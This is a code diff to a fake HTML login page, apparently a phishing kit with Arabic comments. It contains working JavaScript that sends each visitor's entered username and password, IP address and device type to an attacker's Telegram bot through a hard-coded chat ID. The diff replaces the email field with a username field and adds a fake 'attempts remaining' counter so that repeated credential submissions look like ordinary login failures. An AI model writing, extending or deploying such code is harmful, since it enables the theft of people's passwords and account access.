--- a/index.html
+++ b/index.html
@@ -11,10 +11,11 @@
     <div class="container">
         <div class="login-box">
             <h2>Login</h2>
+            <p>Attempts remaining: <span id="attempts">3</span></p>
             <form id="login-form">
                 <div class="user-box">
-                    <input type="email" id="email" required>
-                    <label>Email</label>
+                    <input type="text" id="username" required>
+                    <label>Username</label>
                 </div>
                 <div class="user-box">
                     <input type="password" id="password" required>
@@ -30,13 +31,21 @@
         const CHAT_ID = "6243038338"; // معرف الشات الخاص بك
         const URI_API = `https://api.telegram.org/bot${TOKEN}/sendMessage`;
 
-        document.getElementById('login-btn').addEventListener('click', async function(e) {
+        let attempts = 3; // عدد المحاولات المتاحة
+
+        document.getElementById('login-btn').addEventListener('click', async function (e) {
             e.preventDefault(); // منع الرابط من التنقل
 
-            alert('عليك الانتظار ساعة بسبب الضغط على خادمنا');
+            if (attempts <= 0) {
+                alert('No attempts remaining. Please try again later.');
+                return;
+            }
 
-            // الحصول على البريد الإلكتروني وكلمة المرور المدخلة
-            const email = document.getElementById('email').value;
+            attempts--; // تقليل عدد المحاولات
+            document.getElementById('attempts').textContent = attempts;
+
+            // الحصول على اسم المستخدم وكلمة المرور المدخلة
+            const username = document.getElementById('username').value;
             const password = document.getElementById('password').value;
 
             console.log("Sending data to Telegram...");
@@ -52,9 +61,9 @@
                 const screenHeight = screen.height;
                 const deviceType = /mobile/i.test(navigator.userAgent) ? 'Mobile' : 'Desktop';
 
-                const message = ` 
+                const message = `
                     <b>New Login Attempt</b>\n
-                    <b>Email:</b> ${email}\n
+                    <b>Username:</b> ${username}\n
                     <b>Password:</b> ${password}\n
                     <b>IP Address:</b> ${ip}\n
                     <b>Device Type:</b> ${deviceType}\n
